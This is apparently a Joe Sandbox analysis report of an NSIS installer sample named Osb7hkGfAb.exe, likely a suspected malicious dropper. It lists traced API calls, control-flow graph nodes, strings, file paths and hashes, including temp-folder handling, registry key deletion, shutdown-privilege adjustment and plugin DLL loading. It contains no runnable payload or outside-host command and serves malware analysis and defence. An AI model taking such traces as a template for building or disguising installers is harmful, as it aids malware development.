404943 5419->5471 5475 4057f7 GetDlgItemTextA 5419->5475 5420->5414 5421->5419 5425 40618a 17 API calls 5421->5425 5421->5471 5426 40417b 18 API calls 5423->5426 5424 4047c9 5429 405b7d 18 API calls 5424->5429 5430 404729 SHBrowseForFolderA 5425->5430 5431 40469a 5426->5431 5427 4041e2 8 API calls 5432 404957 5427->5432 5433 404674 5428->5433 5434 4047cf 5429->5434 5430->5419 5435 404741 CoTaskMemFree 5430->5435 5436 40417b 18 API calls 5431->5436 5433->5423 5437 405a8f 3 API calls 5433->5437 5476 4060f7 lstrcpynA 5434->5476 5438 405a8f 3 API calls 5435->5438 5439 4046a8 5436->5439 5437->5423 5440 40474e 5438->5440 5474 4041b0 SendMessageA 5439->5474 5443 404785 SetDlgItemTextA 5440->5443 5448 40618a 17 API calls 5440->5448 5443->5419 5444 4046ae 5446 406500 5 API calls 5444->5446 5445 4047e6 5447 406500 5 API calls 5445->5447 5446->5421 5455 4047ed 5447->5455 5449 40476d lstrcmpiA 5448->5449 5449->5443 5452 40477e lstrcatA 5449->5452 5450 404829 5477 4060f7 lstrcpynA 5450->5477 5452->5443 5453 404830 5454 405b28 4 API calls 5453->5454 5456 404836 GetDiskFreeSpaceA 5454->5456 5455->5450 5458 405ad6 2 API calls 5455->5458 5460 404881 5455->5460 5459 40485a MulDiv 5456->5459 5456->5460 5458->5455 5459->5460 5461 404a89 20 API calls 5460->5461 5463 4048f2 5460->5463 5465 4048df 5461->5465 5462 404915 5478 40419d EnableWindow 5462->5478 5463->5462 5464 40140b 2 API calls 5463->5464 5464->5462 5467 4048f4 SetDlgItemTextA 5465->5467 5468 4048e4 5465->5468 5467->5463 5470 4049c4 20 API calls 5468->5470 5469 404931 5469->5471 5472 404566 SendMessageA 5469->5472 5470->5463 5471->5427 5472->5471 5473->5417 5474->5444 5475->5424 5476->5445 5477->5453 5478->5469 5479 6ff81837 5480 6ff8185a 5479->5480 5481 6ff8188a GlobalFree 5480->5481 5482 6ff8189c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5480->5482 5481->5482 5483 6ff81266 2 API calls 5482->5483 5484 6ff81a1e GlobalFree GlobalFree 5483->5484 5485 401490 5486 40521e 24 API calls 5485->5486 5487 401497 5486->5487 

                                                                  Control-flow Graph (graph starting at block 403348-403387; legend: Executed / Not Executed)
                                                                  APIs
                                                                  • SetErrorMode.KERNELBASE ref: 0040336D
                                                                  • GetVersion.KERNEL32 ref: 00403373
                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
                                                                  • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
                                                                  • OleInitialize.OLE32(00000000), ref: 004033E9
                                                                  • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
                                                                  • GetCommandLineA.KERNEL32(datastrrelsers Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
                                                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Osb7hkGfAb.exe",00000020,"C:\Users\user\Desktop\Osb7hkGfAb.exe",00000000,?,00000007,00000009,0000000B), ref: 00403456
                                                                  • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
                                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403564
                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403570
                                                                  • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403584
                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040358C
                                                                  • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
                                                                  • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
                                                                  • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004035B9
                                                                    • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                    • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                    • Part of subcall function 0040390A: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\tranchet,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,76F93410), ref: 004039FA
                                                                    • Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                                    • Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(Call), ref: 00403A18
                                                                    • Part of subcall function 0040390A: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\tranchet), ref: 00403A61
                                                                    • Part of subcall function 0040390A: RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                                    • Part of subcall function 00403830: CloseHandle.KERNEL32(000002B8,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                                                                  • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
                                                                  • ExitProcess.KERNEL32 ref: 00403688
                                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403807
                                                                  • ExitProcess.KERNEL32 ref: 0040382A
                                                                    • Part of subcall function 00405813: MessageBoxIndirectA.USER32(0040A218), ref: 0040586E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                  • String ID: "$"C:\Users\user\Desktop\Osb7hkGfAb.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Osb7hkGfAb.exe$C:\Users\user\tranchet$C:\Users\user\tranchet\Trykmaalere$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$datastrrelsers Setup$~nsu
                                                                  • API String ID: 3776617018-2984032998
                                                                  • Opcode ID: 9f7172ca61a1f038ac1aa6a8db1429cac06e36ed1de7e549aa4fc7ed9372f958
                                                                  • Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
                                                                  • Opcode Fuzzy Hash: 9f7172ca61a1f038ac1aa6a8db1429cac06e36ed1de7e549aa4fc7ed9372f958
                                                                  • Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F

                                                                  Control-flow Graph (graph starting at block 4058bf-4058e5; legend: Executed / Not Executed)
                                                                  APIs
                                                                  • DeleteFileA.KERNELBASE(?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E8
                                                                  • lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405930
                                                                  • lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405951
                                                                  • lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405957
                                                                  • FindFirstFileA.KERNELBASE(0042B898,?,?,?,0040A014,?,0042B898,?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405968
                                                                  • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
                                                                  • FindClose.KERNEL32(00000000), ref: 00405A26
                                                                  Strings
                                                                  • "C:\Users\user\Desktop\Osb7hkGfAb.exe", xrefs: 004058BF
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004058CC
                                                                  • \*.*, xrefs: 0040592A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                  • String ID: "C:\Users\user\Desktop\Osb7hkGfAb.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                  • API String ID: 2035342205-2346750086
                                                                  • Opcode ID: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                                  • Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
                                                                  • Opcode Fuzzy Hash: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                                  • Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                                  Strings
                                                                  • C:\Users\user\tranchet\Trykmaalere, xrefs: 00402230
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                                  • String ID: C:\Users\user\tranchet\Trykmaalere
                                                                  • API String ID: 123533781-3491094995
                                                                  • Opcode ID: d5ac8e536bab36e1472226809c0cdf08a9d371e862c1e59943db98e9419baf02
                                                                  • Instruction ID: cfd0f9f97044ed47efa98841b374527745dcc5d1cf4597a5ef188e8ddd78f045
                                                                  • Opcode Fuzzy Hash: d5ac8e536bab36e1472226809c0cdf08a9d371e862c1e59943db98e9419baf02
                                                                  • Instruction Fuzzy Hash: DF510671A00208AFCB50DFE4C989E9D7BB6FF48314F2041AAF515EB2D1DA799981CB54
                                                                  APIs
                                                                  • FindFirstFileA.KERNELBASE(76F93410,0042C0E0,0042BC98,00405BC0,0042BC98,0042BC98,00000000,0042BC98,0042BC98,76F93410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,76F93410,C:\Users\user\AppData\Local\Temp\), ref: 00406476
                                                                  • FindClose.KERNELBASE(00000000), ref: 00406482
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Find$CloseFileFirst
                                                                  • String ID:
                                                                  • API String ID: 2295610775-0
                                                                  APIs
                                                                  • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 004027B0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: FileFindFirst
                                                                  • String ID:
                                                                  • API String ID: 1974802433-0

                                                                  Control-flow Graph (legend: Executed / Not Executed), first block 40390a-403922
                                                                  APIs
                                                                    • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                    • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                  • lstrcatA.KERNEL32(1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,76F93410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Osb7hkGfAb.exe",00000000), ref: 00403985
                                                                  • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\tranchet,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,76F93410), ref: 004039FA
                                                                  • lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                                  • GetFileAttributesA.KERNEL32(Call), ref: 00403A18
                                                                  • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\tranchet), ref: 00403A61
                                                                    • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                                  • RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
                                                                  • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AEB
                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403B21
                                                                  • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBC0), ref: 00403B4D
                                                                  • GetClassInfoA.USER32(00000000,RichEdit,0042EBC0), ref: 00403B5A
                                                                  • RegisterClassA.USER32(0042EBC0), ref: 00403B63
                                                                  • DialogBoxParamA.USER32(?,00000000,00403CA7,00000000), ref: 00403B82
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                  • String ID: "C:\Users\user\Desktop\Osb7hkGfAb.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\tranchet$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                  • API String ID: 1975747703-145829490

                                                                  Control-flow Graph (legend: Executed / Not Executed), first block 402ea1-402eef
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00402EB2
                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Osb7hkGfAb.exe,00000400), ref: 00402ECE
                                                                    • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\Osb7hkGfAb.exe,80000000,00000003), ref: 00405C94
                                                                    • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                                  • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Osb7hkGfAb.exe,C:\Users\user\Desktop\Osb7hkGfAb.exe,80000000,00000003), ref: 00402F1A
                                                                  • GlobalAlloc.KERNELBASE(00000040,00000020), ref: 00403050
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                  • String ID: "C:\Users\user\Desktop\Osb7hkGfAb.exe"$@TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Osb7hkGfAb.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                  • API String ID: 2803837635-1820964199

                                                                  Control-flow Graph (legend: Executed / Not Executed), first block 40618a-406195
                                                                  APIs
                                                                  • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 004062B5
                                                                  • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,0042A070,00000000,00405256,0042A070,00000000), ref: 004062C8
                                                                  • SHGetSpecialFolderLocation.SHELL32(00405256,76F923A0,?,0042A070,00000000,00405256,0042A070,00000000), ref: 00406304
                                                                  • SHGetPathFromIDListA.SHELL32(76F923A0,Call), ref: 00406312
                                                                  • CoTaskMemFree.OLE32(76F923A0), ref: 0040631E
                                                                  • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
                                                                  • lstrlenA.KERNEL32(Call,?,0042A070,00000000,00405256,0042A070,00000000,00000000,00424248,76F923A0), ref: 00406394
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                  • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                  • API String ID: 717251189-1230650788

                                                                  Control-flow Graph (legend: Executed / Not Executed), first block 401759-40177c
                                                                  APIs
                                                                  • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,00000031), ref: 00401798
                                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,00000031), ref: 004017C2
                                                                    • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,datastrrelsers Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                                    • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,76F923A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                    • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,76F923A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                    • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,76F923A0), ref: 0040527A
                                                                    • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nswE071.tmp$C:\Users\user\AppData\Local\Temp\nswE071.tmp\System.dll$C:\Users\user\tranchet\Trykmaalere$Call

                                                                  Control-flow Graph

                                                                  • Graph starting at block 4030d8-4030ec, nodes marked Executed / Not Executed; API calls in the graph: GetTickCount, MulDiv, wsprintfA
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: CountTick$wsprintf
                                                                  • String ID: ... %d%%$HBB

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetDC.USER32(?), ref: 00401E38
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                                                                  • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                  • String ID: Calibri

                                                                  Control-flow Graph

                                                                  • Graph starting at block 4056e4-40572f, nodes marked Executed / Not Executed; API calls in the graph: CreateDirectoryA, GetLastError, SetFileSecurityA
                                                                  APIs
                                                                  • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                                  • GetLastError.KERNEL32 ref: 0040573B
                                                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
                                                                  • GetLastError.KERNEL32 ref: 0040575A
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040570A
                                                                  • C:\Users\user\Desktop, xrefs: 004056E4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop

                                                                  Control-flow Graph

                                                                  • Graph starting at block 406492-4064b2, nodes marked Executed / Not Executed; API calls in the graph: GetSystemDirectoryA, wsprintfA, LoadLibraryExA
                                                                  APIs
                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                                  • wsprintfA.USER32 ref: 004064E2
                                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                  • String ID: %s%s.dll$UXTHEME$\

                                                                  Control-flow Graph

                                                                  • Graph starting at block 405cbf-405cc9, nodes marked Executed / Not Executed; API calls in the graph: GetTickCount, GetTempFileNameA
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00405CD3
                                                                  • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED
                                                                  Strings
                                                                  • "C:\Users\user\Desktop\Osb7hkGfAb.exe", xrefs: 00405CBF
                                                                  • nsa, xrefs: 00405CCA
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: CountFileNameTempTick
                                                                  • String ID: "C:\Users\user\Desktop\Osb7hkGfAb.exe"$C:\Users\user\AppData\Local\Temp\$nsa

                                                                  Control-flow Graph

                                                                  • Graph starting at block 402cd0-402cf9, nodes marked Executed / Not Executed; API calls in the graph: RegEnumValueA, RegEnumKeyA, RegCloseKey, RegDeleteKeyA
                                                                  APIs
                                                                  • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: CloseEnum$DeleteValue
                                                                  • String ID:

                                                                  Control-flow Graph

                                                                  • Graph starting at block 6ff816db-6ff81717, nodes marked Executed / Not Executed; API calls in the graph: GlobalFree, FreeLibrary
                                                                  APIs
                                                                    • Part of subcall function 6FF81A98: GlobalFree.KERNEL32(?), ref: 6FF81D09
                                                                    • Part of subcall function 6FF81A98: GlobalFree.KERNEL32(?), ref: 6FF81D0E
                                                                    • Part of subcall function 6FF81A98: GlobalFree.KERNEL32(?), ref: 6FF81D13
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF81786
                                                                  • FreeLibrary.KERNEL32(?), ref: 6FF81809
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF8182E
                                                                    • Part of subcall function 6FF822AF: GlobalAlloc.KERNEL32(00000040,?), ref: 6FF822E0
                                                                    • Part of subcall function 6FF826B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6FF81757,00000000), ref: 6FF82782
                                                                    • Part of subcall function 6FF8156B: wsprintfA.USER32 ref: 6FF81599
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2668548574.000000006FF81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FF80000, based on PE: true
                                                                  • Associated: 00000000.00000002.2666689682.000000006FF80000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000000.00000002.2668568921.000000006FF83000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000000.00000002.2668596503.000000006FF85000.00000002.00000001.01000000.00000005.sdmp
                                                                  Similarity
                                                                  • API ID: Global$Free$Alloc$Librarywsprintf
                                                                  • String ID:

                                                                  Control-flow Graph

                                                                  control_flow_graph 644 401c2e-401c4e call 402bac * 2 649 401c50-401c57 call 402bce 644->649 650 401c5a-401c5e 644->650 649->650 652 401c60-401c67 call 402bce 650->652 653 401c6a-401c70 650->653 652->653 656 401c72-401c8e call 402bac * 2 653->656 657 401cbe-401ce4 call 402bce * 2 FindWindowExA 653->657 668 401c90-401cac SendMessageTimeoutA 656->668 669 401cae-401cbc SendMessageA 656->669 667 401cea 657->667 670 401ced-401cf0 667->670 668->670 669->667 671 401cf6 670->671 672 402a5a-402a69 670->672 671->672
                                                                  APIs
                                                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
